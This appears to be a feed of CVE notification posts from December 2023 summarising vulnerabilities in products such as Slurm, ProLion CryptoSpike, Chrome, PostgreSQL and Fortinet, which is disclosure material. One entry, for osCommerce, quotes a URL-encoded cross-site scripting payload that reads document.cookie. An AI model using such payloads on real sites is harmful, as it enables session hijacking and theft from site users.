🚨 CVE-2023-48085Nagios XI before version 5.11.3 was discovered to contain a remote code execution (RCE) vulnerability via the component command_test.php.🎖@cveNotify |
|
| 2023-12-14 07:17:11 |
🚨 CVE-2023-25651There is a SQL injection vulnerability in some ZTE mobile internet products. Due to insufficient input validation of SMS interface parameter, an authenticated attacker could use the vulnerability to execute SQL injection and cause information leak.🎖@cveNotify |
|
| 2023-12-14 07:17:10 |
🚨 CVE-2023-2247In affected versions of Octopus Deploy it is possible to unmask variable secrets using the variable preview function🎖@cveNotify |
|
| 2023-12-14 06:17:10 |
🚨 CVE-2023-44709PlutoSVG commit 336c02997277a1888e6ccbbbe674551a0582e5c4 and before was discovered to contain an integer overflow via the component plutosvg_load_from_memory.🎖@cveNotify |
|
| 2023-12-14 05:17:23 |
🚨 CVE-2023-6407A CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')vulnerability exists that could cause arbitrary file deletion upon service restart when accessed bya local and low-privileged attacker.🎖@cveNotify |
|
| 2023-12-14 05:17:16 |
🚨 CVE-2023-49938An issue was discovered in SchedMD Slurm 22.05.x and 23.02.x. There is Incorrect Access Control: an attacker can modified their extended group list that is used with the sbcast subsystem, and open files with an unauthorized set of extended groups. The fixed versions are 22.05.11 and 23.02.7.🎖@cveNotify |
|
| 2023-12-14 05:17:15 |
🚨 CVE-2023-49936An issue was discovered in SchedMD Slurm 22.05.x, 23.02.x, and 23.11.x. A NULL pointer dereference leads to denial of service. The fixed versions are 22.05.11, 23.02.7, and 23.11.1.🎖@cveNotify |
|
| 2023-12-14 05:17:12 |
🚨 CVE-2023-49935An issue was discovered in SchedMD Slurm 23.02.x and 23.11.x. There is Incorrect Access Control because of a slurmd Message Integrity Bypass. An attacker can reuse root-level authentication tokens during interaction with the slurmd process. This bypasses the RPC message hashes that protect against undesired MUNGE credential reuse. The fixed versions are 23.02.7 and 23.11.1.🎖@cveNotify |
|
| 2023-12-14 05:17:11 |
🚨 CVE-2023-49933An issue was discovered in SchedMD Slurm 22.05.x, 23.02.x, and 23.11.x. There is Improper Enforcement of Message Integrity During Transmission in a Communication Channel. This allows attackers to modify RPC traffic in a way that bypasses message hash checks. The fixed versions are 22.05.11, 23.02.7, and 23.11.1.🎖@cveNotify |
|
| 2023-12-14 05:17:10 |
🚨 CVE-2023-5984A CWE-494 Download of Code Without Integrity Check vulnerability exists that could allowmodified firmware to be uploaded when an authorized admin user begins a firmware updateprocedure which could result in full control over the device.🎖@cveNotify |
|
| 2023-12-14 03:17:15 |
🚨 CVE-2023-6560An out-of-bounds memory access flaw was found in the io_uring SQ/CQ rings functionality in the Linux kernel. This issue could allow a local user to crash the system.🎖@cveNotify |
|
| 2023-12-14 03:17:14 |
🚨 CVE-2019-17362In LibTomCrypt through 1.18.2, the der_decode_utf8_string function (in der_decode_utf8_string.c) does not properly detect certain invalid UTF-8 sequences. This allows context-dependent attackers to cause a denial of service (out-of-bounds read and crash) or read information from other memory locations via carefully crafted DER-encoded data.🎖@cveNotify |
|
| 2023-12-14 02:17:11 |
🚨 CVE-2023-41720A vulnerability exists on all versions of Ivanti Connect Secure below 22.6R2 where an attacker with a foothold on an Ivanti Connect Secure (ICS) appliance can escalate their privileges by exploiting a vulnerable installed application. This vulnerability allows the attacker to gain elevated execution privileges on the affected system.🎖@cveNotify |
|
| 2023-12-14 02:17:10 |
🚨 CVE-2023-36585Windows upnphost.dll Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-12-14 01:17:15 |
🚨 CVE-2023-43042IBM SAN Volume Controller, IBM Storwize, IBM FlashSystem and IBM Storage Virtualize 8.3 products use default passwords for a privileged user. IBM X-Force ID: 266874.🎖@cveNotify |
|
| 2023-12-14 01:17:11 |
🚨 CVE-2022-43843IBM Spectrum Scale 5.1.5.0 through 5.1.5.1 uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 239080.🎖@cveNotify |
|
| 2023-12-14 01:17:10 |
🚨 CVE-2023-30222An information disclosure vulnerability in 4D SAS 4D Server Application v17, v18, v19 R7 and earlier allows attackers to retrieve password hashes for all users via eavesdropping.🎖@cveNotify |
|
| 2023-12-14 00:17:27 |
🚨 CVE-2023-21751Azure DevOps Server Spoofing Vulnerability🎖@cveNotify |
|
| 2023-12-14 00:17:21 |
🚨 CVE-2023-42481In SAP Commerce Cloud - versions HY_COM 1905, HY_COM 2005, HY_COM2105, HY_COM 2011, HY_COM 2205, COM_CLOUD 2211, a locked B2B user can misuse the forgotten password functionality to un-block his user account again and re-gain access if SAP Commerce Cloud - Composable Storefront is used as storefront, due to weak access controls in place. This leads to a considerable impact on confidentiality and integrity.🎖@cveNotify |
|
| 2023-12-14 00:17:20 |
🚨 CVE-2023-36650A missing integrity check in the update system in ProLion CryptoSpike 3.0.15P2 allows attackers to execute OS commands as the root Linux user on the host system via forged update packages.🎖@cveNotify |
|
| 2023-12-14 00:17:19 |
🚨 CVE-2023-36647A hard-coded cryptographic private key used to sign JWT authentication tokens in ProLion CryptoSpike 3.0.15P2 allows remote attackers to impersonate arbitrary users and roles in web management and REST API endpoints via crafted JWT tokens.🎖@cveNotify |
|
| 2023-12-13 23:47:10 |
🚨 CVE-2023-36648Missing authentication in the internal data streaming system in ProLion CryptoSpike 3.0.15P2 allows remote unauthenticated users to read potentially sensitive information and deny service to users by directly reading and writing data in Apache Kafka (as consumer and producer).🎖@cveNotify |
|
| 2023-12-13 23:17:16 |
🚨 CVE-2023-45166IBM AIX 7.2, 7.3, and VIOS 3.1 could allow a non-privileged local user to exploit a vulnerability in the piodmgrsu command to obtain elevated privileges. IBM X-Force ID: 267964.🎖@cveNotify |
|
| 2023-12-13 23:17:11 |
🚨 CVE-2023-43585Improper access control in Zoom Mobile App for iOS and Zoom SDKs for iOS before version 5.16.5 may allow an authenticated user to conduct a disclosure of information via network access.🎖@cveNotify |
|
| 2023-12-13 23:17:10 |
🚨 CVE-2023-42898The issue was addressed with improved memory handling. This issue is fixed in macOS Sonoma 14.2, watchOS 10.2, iOS 17.2 and iPadOS 17.2, tvOS 17.2. Processing an image may lead to arbitrary code execution.🎖@cveNotify |
|
| 2023-12-13 22:17:23 |
🚨 CVE-2023-47623Scrypted is a home video integration and automation platform. In versions 0.55.0 and prior, a reflected cross-site scripting vulnerability exists in the login page via the `redirect_uri` parameter. By specifying a url with the javascript scheme (`javascript:`), an attacker can run arbitrary JavaScript code after the login. As of time of publication, no known patches are available.🎖@cveNotify |
|
| 2023-12-13 22:17:17 |
🚨 CVE-2023-47620Scrypted is a home video integration and automation platform. In versions 0.55.0 and prior, a reflected cross-site scripting vulnerability exists in the plugin-http.ts file via the `owner' and 'pkg` parameters. An attacker can run arbitrary JavaScript code. As of time of publication, no known patches are available.🎖@cveNotify |
|
| 2023-12-13 22:17:16 |
🚨 CVE-2023-5500This vulnerability allows an remote attacker with low privileges to misuse Improper Control of Generation of Code ('Code Injection') to gain full control of the affected device.🎖@cveNotify |
|
| 2023-12-13 22:17:15 |
🚨 CVE-2023-6656** UNSUPPORTED WHEN ASSIGNED ** A vulnerability was found in DeepFaceLab pretrained DF.wf.288res.384.92.72.22. It has been rated as critical. Affected by this issue is some unknown functionality of the file DFLIMG/DFLJPG.py. The manipulation leads to deserialization. The attack may be launched remotely. The complexity of an attack is rather high. The exploitation is known to be difficult. The identifier of this vulnerability is VDB-247364. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.🎖@cveNotify |
|
| 2023-12-13 22:17:11 |
🚨 CVE-2023-5869A flaw was found in PostgreSQL that allows authenticated database users to execute arbitrary code through missing overflow checks during SQL array value modification. This issue exists due to an integer overflow during array modification where a remote user can trigger the overflow by providing specially crafted data. This enables the execution of arbitrary code on the target system, allowing users to write arbitrary bytes to memory and extensively read the server's memory.🎖@cveNotify |
|
| 2023-12-13 22:17:10 |
🚨 CVE-2023-39417IN THE EXTENSION SCRIPT, a SQL Injection vulnerability was found in PostgreSQL if it uses @extowner@, @extschema@, or @extschema:...@ inside a quoting construct (dollar quoting, '', or ""). If an administrator has installed files of a vulnerable, trusted, non-bundled extension, an attacker with database-level CREATE privilege can execute arbitrary code as the bootstrap superuser.🎖@cveNotify |
|
| 2023-12-13 21:47:23 |
🚨 CVE-2023-5854Use after free in Profiles in Google Chrome prior to 119.0.6045.105 allowed a remote attacker who convinced a user to engage in specific UI gestures to potentially exploit heap corruption via specific UI gestures. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-12-13 21:47:16 |
🚨 CVE-2023-5850Incorrect security UI in Downloads in Google Chrome prior to 119.0.6045.105 allowed a remote attacker to perform domain spoofing via a crafted domain name. (Chromium security severity: Medium)🎖@cveNotify |
|
| 2023-12-13 21:47:15 |
🚨 CVE-2023-5849Integer overflow in USB in Google Chrome prior to 119.0.6045.105 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-12-13 21:47:11 |
🚨 CVE-2023-5480Inappropriate implementation in Payments in Google Chrome prior to 119.0.6045.105 allowed a remote attacker to bypass XSS preventions via a malicious file. (Chromium security severity: High)🎖@cveNotify |
|
| 2023-12-13 21:47:10 |
🚨 CVE-2021-30498A flaw was found in libcaca. A heap buffer overflow in export.c in function export_tga might lead to memory corruption and other potential consequences.🎖@cveNotify |
|
| 2023-12-13 21:17:23 |
🚨 CVE-2023-42932A logic issue was addressed with improved checks. This issue is fixed in macOS Sonoma 14.2, macOS Ventura 13.6.3, macOS Monterey 12.7.2. An app may be able to access protected user data.🎖@cveNotify |
|
| 2023-12-13 21:17:17 |
🚨 CVE-2023-42927A privacy issue was addressed with improved private data redaction for log entries. This issue is fixed in macOS Sonoma 14.2, iOS 17.2 and iPadOS 17.2, watchOS 10.2. An app may be able to access sensitive user data.🎖@cveNotify |
|
| 2023-12-13 21:17:16 |
🚨 CVE-2023-40446The issue was addressed with improved memory handling. This issue is fixed in macOS Monterey 12.7.1, iOS 16.7.2 and iPadOS 16.7.2, iOS 17.1 and iPadOS 17.1. Processing maliciously crafted input may lead to arbitrary code execution in user-installed apps.🎖@cveNotify |
|
| 2023-12-13 21:17:15 |
🚨 CVE-2023-36654Directory traversal in the log-download REST API endpoint in ProLion CryptoSpike 3.0.15P2 allows remote authenticated attackers to download host server SSH private keys (associated with a Linux root user) by injecting paths inside REST API endpoint parameters.🎖@cveNotify |
|
| 2023-12-13 21:17:11 |
🚨 CVE-2023-48424U-Boot shell vulnerability resulting in Privilege escalation in a production device🎖@cveNotify |
|
| 2023-12-13 21:17:10 |
🚨 CVE-2023-50465A stored cross-site scripting (XSS) vulnerability exists in Monica (aka MonicaHQ) 4.0.0 via an SVG document uploaded by an authenticated user.🎖@cveNotify |
|
| 2023-12-13 20:47:22 |
🚨 CVE-2023-36646Incorrect user role checking in multiple REST API endpoints in ProLion CryptoSpike 3.0.15P2 allows a remote attacker with low privileges to execute privileged functions and achieve privilege escalation via REST API endpoint invocation.🎖@cveNotify |
|
| 2023-12-13 20:47:17 |
🚨 CVE-2023-5750The EmbedPress WordPress plugin before 3.9.2 does not sanitise and escape a parameter before outputting it back in the page containing a specific content, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin🎖@cveNotify |
|
| 2023-12-13 20:47:16 |
🚨 CVE-2023-49418TOTOLink A7000R V9.1.0u.6115_B20201022has a stack overflow vulnerability via setIpPortFilterRules.🎖@cveNotify |
|
| 2023-12-13 20:47:11 |
🚨 CVE-2023-6658A vulnerability classified as critical was found in SourceCodester Simple Student Attendance System 1.0. This vulnerability affects unknown code of the file ajax-api.php?action=save_attendance. The manipulation of the argument class_id leads to sql injection. The exploit has been disclosed to the public and may be used. VDB-247366 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-13 20:17:10 |
🚨 CVE-2023-45670Frigate is an open source network video recorder. Prior to version 0.13.0 Beta 3, the `config/save` and `config/set` endpoints of Frigate do not implement any CSRF protection. This makes it possible for a request sourced from another site to update the configuration of the Frigate server (e.g. via "drive-by" attack). Exploiting this vulnerability requires the attacker to both know very specific information about a user's Frigate server and requires an authenticated user to be tricked into clicking a specially crafted link to their Frigate instance. This vulnerability could exploited by an attacker under the following circumstances: Frigate publicly exposed to the internet (even with authentication); attacker knows the address of a user's Frigate instance; attacker crafts a specialized page which links to the user's Frigate instance; attacker finds a way to get an authenticated user to visit their specialized page and click the button/link. This issue can lead to arbitrary configuration updates for the Frigate server, resulting in denial of service and possible data exfiltration. Version 0.13.0 Beta 3 contains a patch.🎖@cveNotify |
|
| 2023-12-13 19:47:11 |
🚨 CVE-2023-42909Multiple memory corruption issues were addressed with improved input validation. This issue is fixed in macOS Sonoma 14.2. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution.🎖@cveNotify |
|
| 2023-12-13 19:47:10 |
🚨 CVE-2023-50446An issue was discovered in Mullvad VPN Windows app before 2023.6-beta1. Insufficient permissions on a directory allow any local unprivileged user to escalate privileges to SYSTEM.🎖@cveNotify |
|
| 2023-12-13 19:17:11 |
🚨 CVE-2023-42911Multiple memory corruption issues were addressed with improved input validation. This issue is fixed in macOS Sonoma 14.2. Processing a maliciously crafted file may lead to unexpected app termination or arbitrary code execution.🎖@cveNotify |
|
| 2023-12-13 19:17:10 |
🚨 CVE-2023-4486Under certain circumstances, invalid authentication credentials could be sent to the login endpoint of Johnson Controls Metasys NAE55, SNE, and SNC engines prior to version 12.0.4 and Facility Explorer F4-SNC engines prior to versions 11.0.6 and 12.0.4 to cause denial-of-service.🎖@cveNotify |
|
| 2023-12-13 18:47:33 |
🚨 CVE-2023-42883The issue was addressed with improved memory handling. This issue is fixed in Safari 17.2, macOS Sonoma 14.2, iOS 17.2 and iPadOS 17.2, watchOS 10.2, tvOS 17.2, iOS 16.7.3 and iPadOS 16.7.3. Processing an image may lead to a denial-of-service.🎖@cveNotify |
|
| 2023-12-13 18:47:26 |
🚨 CVE-2023-48311dockerspawner is a tool to spawn JupyterHub single user servers in Docker containers. Users of JupyterHub deployments running DockerSpawner starting with 0.11.0 without specifying `DockerSpawner.allowed_images` configuration allow users to launch _any_ pullable docker image, instead of restricting to only the single configured image, as intended. This issue has been addressed in commit `3ba4b665b` which has been included in dockerspawner release version 13. Users are advised to upgrade. Users unable to upgrade should explicitly set `DockerSpawner.allowed_images` to a non-empty list containing only the default image will result in the intended default behavior.🎖@cveNotify |
|
| 2023-12-13 18:47:25 |
🚨 CVE-2023-6574A vulnerability was found in Beijing Baichuo Smart S20 up to 20231120 and classified as critical. Affected by this issue is some unknown functionality of the file /sysmanage/updateos.php of the component HTTP POST Request Handler. The manipulation of the argument 1_file_upload leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-247154 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-12-13 18:17:33 |
🚨 CVE-2023-42886An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in macOS Sonoma 14.2, macOS Ventura 13.6.3, macOS Monterey 12.7.2. A user may be able to cause unexpected app termination or arbitrary code execution.🎖@cveNotify |
|
| 2023-12-13 18:17:27 |
🚨 CVE-2023-50457An issue was discovered in Zammad before 6.2.0. When listing tickets linked to a knowledge base answer, or knowledge base answers of a ticket, a user could see entries for which they lack permissions.🎖@cveNotify |
|
| 2023-12-13 18:17:26 |
🚨 CVE-2023-50454An issue was discovered in Zammad before 6.2.0. In several subsystems, SSL/TLS was used to establish connections to external services without proper validation of hostname and certificate authority. This is exploitable by man-in-the-middle attackers.🎖@cveNotify |
|
| 2023-12-13 18:17:25 |
🚨 CVE-2023-6337HashiCorp Vault and Vault Enterprise 1.12.0 and newer are vulnerable to a denial of service through memory exhaustion of the host when handling large unauthenticated and authenticated HTTP requests from a client. Vault will attempt to map the request to memory, resulting in the exhaustion of available memory on the host, which may cause Vault to crash.Fixed in Vault 1.15.4, 1.14.8, 1.13.12.🎖@cveNotify |
|
| 2023-12-13 18:17:21 |
🚨 CVE-2023-49782Collabora Online is a collaborative online office suite based on LibreOffice technology. Users of Nextcloud with `Collabora Online - Built-in CODE Server` app can be vulnerable to attack via proxy.php. The bug was fixed in Collabora Online - Built-in CODE Server (richdocumentscode) release 23.5.601. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2023-12-13 18:17:20 |
🚨 CVE-2023-5072Denial of Service in JSON-Java versions up to and including 20230618. A bug in the parser means that an input string of modest size can lead to indefinite amounts of memory being used.🎖@cveNotify |
|
| 2023-12-13 17:47:21 |
🚨 CVE-2023-49490XunRuiCMS v4.5.5 was discovered to contain a reflective cross-site scripting (XSS) vulnerability via the component /admin.php.🎖@cveNotify |
|
| 2023-12-13 17:47:20 |
🚨 CVE-2023-49488A cross-site scripting (XSS) vulnerability in Openfiler ESA v2.99.1 allows attackers to execute arbitrary web scripts or HTML via injecting a crafted payload into the nic parameter.🎖@cveNotify |
|
| 2023-12-13 17:47:16 |
🚨 CVE-2023-5955The Contact Form Email WordPress plugin before 1.3.44 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2023-12-13 17:47:15 |
🚨 CVE-2023-49799`nuxt-api-party` is an open source module to proxy API requests. nuxt-api-party attempts to check if the user has passed an absolute URL to prevent the aforementioned attack. This has been recently changed to use the regular expression `^https?://`, however this regular expression can be bypassed by an absolute URL with leading whitespace. For example `\nhttps://whatever.com` which has a leading newline. According to the fetch specification, before a fetch is made the URL is normalized. "To normalize a byte sequence potentialValue, remove any leading and trailing HTTP whitespace bytes from potentialValue.". This means the final request will be normalized to `https://whatever.com` bypassing the check and nuxt-api-party will send a request outside of the whitelist. This could allow us to leak credentials or perform Server-Side Request Forgery (SSRF). This vulnerability has been addressed in version 0.22.1. Users are advised to upgrade. Users unable to upgrade should revert to the previous method of detecting absolute URLs.🎖@cveNotify |
|
| 2023-12-13 17:17:31 |
🚨 CVE-2023-48414In the Pixel Camera Driver, there is a possible use after free due to a logic error in the code. This could lead to local escalation of privilege with System execution privileges needed. User interaction is not needed for exploitation.🎖@cveNotify |
|
| 2023-12-13 17:17:24 |
🚨 CVE-2023-50164An attacker can manipulate file upload params to enable paths traversal and under some circumstances this can lead to uploading a malicious file which can be used to perform Remote Code Execution.Users are recommended to upgrade to versions Struts 2.5.33 or Struts 6.3.0.2 or greater to fix this issue.🎖@cveNotify |
|
| 2023-12-13 17:17:23 |
🚨 CVE-2023-6269An argument injection vulnerability has been identified in the administrative web interface of the Atos Unify OpenScape products "Session Border Controller" (SBC) and "Branch", before version V10 R3.4.0, and OpenScape "BCF" before versions V10R10.12.00 and V10R11.05.02. This allows an unauthenticated attacker to gain root access to the appliance via SSH (scope change) and also bypass authentication for the administrative interface and gain access as an arbitrary (administrative) user.🎖@cveNotify |
|
| 2023-12-13 16:17:46 |
🚨 CVE-2023-6762A vulnerability, which was classified as critical, was found in Thecosy IceCMS 2.0.1. Affected is an unknown function of the file /article/DelectArticleById/ of the component Article Handler. The manipulation leads to permission issues. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-247890 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-13 16:17:45 |
🚨 CVE-2023-6760A vulnerability classified as critical was found in Thecosy IceCMS up to 2.0.1. This vulnerability affects unknown code. The manipulation leads to manage user sessions. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-247888.🎖@cveNotify |
|
| 2023-12-13 16:17:44 |
🚨 CVE-2023-50453An issue was discovered in Zammad before 6.2.0. It uses the public endpoint /api/v1/signshow for its login screen. This endpoint returns internal configuration data of user object attributes, such as selectable values, which should not be visible to the public.🎖@cveNotify |
|
| 2023-12-13 16:17:41 |
🚨 CVE-2022-48614Special:Ask in Semantic MediaWiki before 4.0.2 allows Reflected XSS.🎖@cveNotify |
|
| 2023-12-13 16:17:40 |
🚨 CVE-2023-50449JFinalCMS 5.0.0 could allow a remote attacker to read files via ../ Directory Traversal in the /common/down/file fileKey parameter.🎖@cveNotify |
|
| 2023-12-13 16:17:39 |
🚨 CVE-2023-32968A buffer copy without checking size of input vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated administrators to execute code via a network.We have already fixed the vulnerability in the following versions:QTS 5.0.1.2514 build 20230906 and laterQTS 5.1.2.2533 build 20230926 and laterQuTS hero h5.0.1.2515 build 20230907 and laterQuTS hero h5.1.2.2534 build 20230927 and later🎖@cveNotify |
|
| 2023-12-13 16:17:35 |
🚨 CVE-2023-33170ASP.NET and Visual Studio Security Feature Bypass Vulnerability🎖@cveNotify |
|
| 2023-12-13 16:17:34 |
🚨 CVE-2023-33127.NET and Visual Studio Elevation of Privilege Vulnerability🎖@cveNotify |
|
| 2023-12-13 16:17:33 |
🚨 CVE-2023-28299Visual Studio Spoofing Vulnerability🎖@cveNotify |
|
| 2023-12-13 16:17:29 |
🚨 CVE-2022-41032NuGet Client Elevation of Privilege Vulnerability.🎖@cveNotify |
|
| 2023-12-13 16:17:28 |
🚨 CVE-2022-24464.NET and Visual Studio Denial of Service Vulnerability🎖@cveNotify |
|
| 2023-12-13 15:47:26 |
🚨 CVE-2023-43744An OS command injection vulnerability in Zultys MX-SE, MX-SE II, MX-E, MX-Virtual, MX250, and MX30 with firmware versions prior to 17.0.10 patch 17161 and 16.04 patch 16109 allows an administrator to execute arbitrary OS commands via a file name parameter in a patch application function. The Zultys MX Administrator client has a "Patch Manager" section that allows administrators to apply patches to the device. The user supplied filename for the patch file is passed to a shell script without validation. Including bash command substitution characters in a patch file name results in execution of the provided command.🎖@cveNotify |
|
| 2023-12-13 15:17:28 |
🚨 CVE-2023-6758A vulnerability was found in Thecosy IceCMS 2.0.1. It has been rated as critical. Affected by this issue is some unknown functionality of the file /adplanet/PlanetCommentList of the component API. The manipulation leads to improper access controls. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-247886 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2023-12-13 15:17:24 |
🚨 CVE-2023-6609A vulnerability was found in osCommerce 4. It has been classified as problematic. This affects an unknown part of the file /b2b-supermarket/catalog/all-products. The manipulation of the argument keywords with the input %27%22%3E%3Cimg%2Fsrc%3D1+onerror%3Dalert%28document.cookie%29%3E leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-247245 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2023-12-13 15:17:23 |
🚨 CVE-2023-49957An issue was discovered in Dalmann OCPP.Core before 1.3.0 for OCPP (Open Charge Point Protocol) for electric vehicles. It permits multiple transactions with the same connectorId and idTag, contrary to the expected ConcurrentTx status. This could result in critical transaction management and billing errors. NOTE: the vendor's perspective is "Imagine you've got two cars in your family and want to charge both in parallel on the same account/token? Why should that be rejected?"🎖@cveNotify |
|
| 2023-12-13 15:17:19 |
🚨 CVE-2023-6448Unitronics Vision Series PLCs and HMIs use default administrative passwords. An unauthenticated attacker with network access to a PLC or HMI can take administrative control of the system.🎖@cveNotify |
|
| 2023-12-13 15:17:18 |
🚨 CVE-2013-4412slim has NULL pointer dereference when using crypt() method from glibc 2.17🎖@cveNotify |
|
| 2023-12-13 14:47:29 |
🚨 CVE-2023-48628Adobe Substance 3D Sampler versions 4.2.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-12-13 14:47:22 |
🚨 CVE-2023-48625Adobe Substance 3D Sampler versions 4.2.1 and earlier are affected by an out-of-bounds write vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-12-13 14:47:21 |
🚨 CVE-2023-47326Silverpeas Core 6.3.1 is vulnerable to Cross Site Request Forgery (CSRF) via the Domain SQL Create function.🎖@cveNotify |
|
| 2023-12-13 14:47:18 |
🚨 CVE-2023-47325Silverpeas Core 6.3.1 administrative "Bin" feature is affected by broken access control. A user with low privileges is able to navigate directly to the bin, revealing all deleted spaces. The user can then restore or permanently delete the spaces.🎖@cveNotify |
|
| 2023-12-13 14:47:17 |
🚨 CVE-2023-47324Silverpeas Core 6.3.1 is vulnerable to Cross Site Scripting (XSS) via the message/notification feature.🎖@cveNotify |
|
| 2023-12-13 13:47:46 |
🚨 CVE-2023-46675An issue was discovered by Elastic whereby sensitive information may be recorded in Kibana logs in the event of an error or in the event where debug level logging is enabled in Kibana. Elastic has released Kibana 8.11.2 which resolves this issue. The messages recorded in the log may contain Account credentials for the kibana_system user, API Keys, and credentials of Kibana end-users, Elastic Security package policy objects which can contain private keys, bearer token, and sessions of 3rd-party integrations and finally Authorization headers, client secrets, local file paths, and stack traces. The issue may occur in any Kibana instance running an affected version that could potentially receive an unexpected error when communicating to Elasticsearch causing it to include sensitive data into Kibana error logs. It could also occur under specific circumstances when debug level logging is enabled in Kibana. Note: It was found that the fix for ESA-2023-25 in Kibana 8.11.1 for a similar issue was incomplete.🎖@cveNotify |
|
| 2023-12-13 13:47:45 |
🚨 CVE-2023-45587An improper neutralization of input during web page generation ('cross-site scripting') in Fortinet FortiSandbox version 4.4.1 and 4.4.0 and 4.2.0 through 4.2.5 and 4.0.0 through 4.0.3 and 3.2.0 through 3.2.4 and 3.1.0 through 3.1.5 allows attacker to execute unauthorized code or commands via crafted HTTP requests🎖@cveNotify |
|
| 2023-12-13 13:47:44 |
🚨 CVE-2023-41678A double free in Fortinet FortiOS versions 7.0.0 through 7.0.5, FortiPAM version 1.0.0 through 1.0.3, 1.1.0 through 1.1.1 allows attacker to execute unauthorized code or commands via specifically crafted request.🎖@cveNotify |
|
| 2023-12-13 13:47:41 |
🚨 CVE-2023-41673An improper authorization vulnerability [CWE-285] in Fortinet FortiADC version 7.4.0 and before 7.2.2 may allow a low privileged user to read or backup the full system configuration via HTTP or HTTPS requests.🎖@cveNotify |
|
| 2023-12-13 13:47:40 |
🚨 CVE-2023-36639A use of externally-controlled format string in Fortinet FortiProxy versions 7.2.0 through 7.2.4, 7.0.0 through 7.0.10, FortiOS versions 7.4.0, 7.2.0 through 7.2.4, 7.0.0 through 7.0.11, 6.4.0 through 6.4.12, 6.2.0 through 6.2.15, 6.0.0 through 6.0.17, FortiPAM versions 1.0.0 through 1.0.3 allows attacker to execute unauthorized code or commands via specially crafted API requests.🎖@cveNotify |
|
| 2023-12-13 13:47:39 |
🚨 CVE-2023-45801Improper Authentication vulnerability in Nadatel DVR allows Information Elicitation.This issue affects DVR: from 3.0.0 before 9.9.0.🎖@cveNotify |
|
| 2023-12-13 13:47:35 |
🚨 CVE-2023-47577An issue discovered in Relyum RELY-PCIe 22.2.1 and RELY-REC 23.1.0 allows for unauthorized password changes due to no check for current password.🎖@cveNotify |
|
| 2023-12-13 13:47:34 |
🚨 CVE-2023-47575An issue was discovered on Relyum RELY-PCIe 22.2.1 and RELY-REC 23.1.0 devices. The web interfaces of the Relyum devices are susceptible to reflected XSS.🎖@cveNotify |
|
| 2023-12-13 13:47:30 |
🚨 CVE-2023-45800Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Hanbiro Hanbiro groupware allows Information Elicitation.This issue affects Hanbiro groupware: from V3.8.79 before V3.8.81.1.🎖@cveNotify |
|
| 2023-12-13 13:47:29 |
🚨 CVE-2023-33412The web interface in the Intelligent Platform Management Interface (IPMI) baseboard management controller (BMC) implementation on Supermicro X11 and M11 based devices, with firmware versions before 3.17.02, allows remote authenticated users to execute arbitrary commands via a crafted request targeting vulnerable cgi endpoints.🎖@cveNotify |
|
| 2023-12-13 12:17:31 |
🚨 CVE-2023-44362Adobe Prelude versions 22.6 and earlier are affected by an Access of Uninitialized Pointer vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to bypass mitigations such as ASLR. Exploitation of this issue requires user interaction in that a victim must open a malicious file.🎖@cveNotify |
|
| 2023-12-13 11:17:28 |
🚨 CVE-2023-6723An unrestricted file upload vulnerability has been identified in Repbox, which allows an attacker to upload malicious files via the transforamationfileupload function, due to the lack of proper file type validation controls, resulting in a full system compromise.🎖@cveNotify |
|
| 2023-12-13 11:17:27 |
🚨 CVE-2023-6379Cross-site scripting (XSS) vulnerability in Alkacon Software Open CMS, affecting versions 14 and 15 of the 'Mercury' template. This vulnerability could allow a remote attacker to send a specially crafted JavaScript payload to a victim and partially take control of their browsing session.🎖@cveNotify |
|
| 2023-12-13 09:17:33 |
🚨 CVE-2023-6660When a program running on an affected system appends data to a file via an NFS client mount, the bug can cause the NFS client to fail to copy in the data to be written but proceed as though the copy operation had succeeded. This means that the data to be written is instead replaced with whatever data had been in the packet buffer previously. Thus, an unprivileged user with access to an affected system may abuse the bug to trigger disclosure of sensitive information. In particular, the leak is limited to data previously stored in mbufs, which are used for network transmission and reception, and for certain types of inter-process communication.The bug can also be triggered unintentionally by system applications, in which case the data written by the application to an NFS mount may be corrupted. Corrupted data is written over the network to the NFS server, and thus also susceptible to being snooped by other hosts on the network.Note that the bug exists only in the NFS client; the version and implementation of the server has no effect on whether a given system is affected by the problem.🎖@cveNotify |
|
| 2023-12-13 09:17:28 |
🚨 CVE-2023-44251** UNSUPPORTED WHEN ASSIGNED **A improper limitation of a pathname to a restricted directory ('path traversal') vulnerability [CWE-22] in Fortinet FortiWAN version 5.2.0 through 5.2.1 and version 5.1.1. through 5.1.2 may allow an authenticated attacker to read and delete arbitrary file of the system via crafted HTTP or HTTPs requests.🎖@cveNotify |
|
| 2023-12-13 09:17:27 |
